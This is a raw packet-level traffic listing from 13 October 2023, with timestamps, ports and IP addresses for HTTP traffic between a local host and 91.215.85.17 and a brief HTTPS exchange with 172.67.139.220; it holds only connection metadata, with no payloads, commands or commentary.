Oct 13, 2023 15:20:55.622421026 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.622476101 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.622498989 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.622539043 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.622592926 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.622606993 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.622644901 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.622694969 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.622713089 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.622781038 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.622817993 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.622831106 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.622853994 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.622904062 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.622945070 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.623013020 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.623049021 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.623064995 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.623125076 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.623197079 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.623213053 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.623281002 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.623332024 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.623373985 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.623410940 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.623460054 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.623548031 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.623610973 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.623661041 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.623678923 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.623716116 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.623766899 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.623785019 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.623852015 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.623888016 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.623900890 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.623924017 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.623976946 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.623990059 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.624027967 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.624079943 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.624121904 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.624298096 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.624335051 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.624347925 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.624372959 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.624422073 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.624442101 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.624553919 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.624607086 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.624663115 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.624731064 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.624799013 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.624855995 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.624892950 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.624946117 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.624999046 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.625036955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.625072002 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.625092983 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.625108957 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.625165939 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.625178099 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.625215054 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.625250101 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.625284910 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.625346899 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.625397921 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.625413895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.625629902 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.625665903 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.625683069 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.625701904 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.625757933 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.625771046 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.625807047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.625861883 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.625914097 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.626091957 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.626127958 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.626143932 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.626235962 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.626272917 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.626287937 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.626310110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.626362085 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.626375914 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.626413107 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.626467943 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.626494884 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.626624107 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.626676083 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.626710892 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.626749039 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.626797915 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.626816034 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.626852989 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.626903057 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.626959085 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.627027988 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.627063990 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.627079964 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.627167940 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.627206087 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.627226114 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.627283096 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.627320051 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.627336979 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.627388954 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.627441883 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.627527952 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.627639055 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.627686977 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.627834082 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.627871990 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.627907991 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.627924919 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.627943993 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.627991915 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.628106117 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.628210068 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.628257990 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.628268003 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.628334999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.628381968 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.628469944 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.628534079 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.628586054 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.628618956 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.628686905 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.628725052 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.628736973 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.628782988 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.628818989 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.628835917 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.628916979 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.628964901 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.629025936 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.629142046 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.629177094 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.629214048 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.629266024 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.629266024 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.629292011 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.629427910 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.629478931 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.629512072 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.629554987 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.629622936 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.629622936 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.629709959 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.629755974 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.629808903 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.629844904 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.629899025 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.629911900 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.630209923 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.630259037 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.630285978 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.630353928 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.630400896 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.630475044 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.630511999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.630563021 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.630578041 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.630667925 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.630745888 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.630752087 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.630820990 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.630857944 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.630877972 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.630935907 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.630973101 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.630983114 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.631071091 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.631108046 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.631124973 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.631164074 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.631200075 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.631220102 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.631236076 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.631275892 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.631287098 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.631335974 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.631347895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.631397963 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.631408930 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.631442070 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.631485939 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.631517887 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.631548882 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.631594896 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.631602049 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.631681919 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.631730080 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.655757904 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.782486916 CEST	49723	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:20:55.782572031 CEST	443	49723	172.67.139.220	192.168.2.5
Oct 13, 2023 15:20:55.782665968 CEST	49723	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:20:55.798886061 CEST	49723	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:20:55.798964977 CEST	443	49723	172.67.139.220	192.168.2.5
Oct 13, 2023 15:20:55.975967884 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.024985075 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.115890026 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.115890026 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.137476921 CEST	443	49723	172.67.139.220	192.168.2.5
Oct 13, 2023 15:20:56.137567043 CEST	49723	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:20:56.286258936 CEST	49723	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:20:56.286335945 CEST	443	49723	172.67.139.220	192.168.2.5
Oct 13, 2023 15:20:56.286670923 CEST	443	49723	172.67.139.220	192.168.2.5
Oct 13, 2023 15:20:56.288923979 CEST	49723	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:20:56.292216063 CEST	49723	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:20:56.338443995 CEST	443	49723	172.67.139.220	192.168.2.5
Oct 13, 2023 15:20:56.467973948 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.485266924 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.488641024 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.488720894 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.840646029 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.860898972 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.860941887 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.860981941 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.861018896 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.861042976 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.861054897 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.861092091 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.861105919 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.861145020 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.861174107 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.861243010 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.861279011 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.861330986 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.861332893 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.861385107 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.861433029 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.861515999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.861576080 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.861632109 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.861639977 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.861679077 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.861691952 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.861747026 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.861782074 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.861848116 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.861890078 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.861927032 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.861948013 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.861994028 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.862061024 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.862097025 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.862114906 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.862149000 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.862209082 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.862359047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.862447977 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.862485886 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.862503052 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.862531900 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.862621069 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.862703085 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.862744093 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.862778902 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.862797976 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.862814903 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.862827063 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.862912893 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.862948895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.863003016 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.863024950 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.863071918 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.863091946 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.863157988 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.863213062 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.863270998 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.863279104 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.863315105 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.863328934 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.863383055 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.863419056 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.863473892 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.863483906 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.863521099 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.863532066 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.863586903 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.863651991 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.863708019 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.863729954 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.863765001 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.863780975 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.863863945 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.863899946 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.863953114 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.863991976 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.864027977 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.864044905 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.864095926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.864180088 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.864216089 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.864232063 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.864263058 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.864272118 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.864337921 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.864403009 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.864438057 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.864459038 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.864485979 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.864510059 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.864546061 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.864613056 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.864666939 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.864680052 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.864732027 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.864749908 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.864814997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.864850044 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.864900112 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.864957094 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.865024090 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.865077972 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.865078926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.865130901 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.865149021 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.865185022 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.865251064 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.865308046 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.865360975 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.865396976 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.865415096 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.865463972 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.865530014 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.865566969 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.865597963 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.865632057 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.865648031 CEST	80	49721	91.215.85.17	192.168.2.5
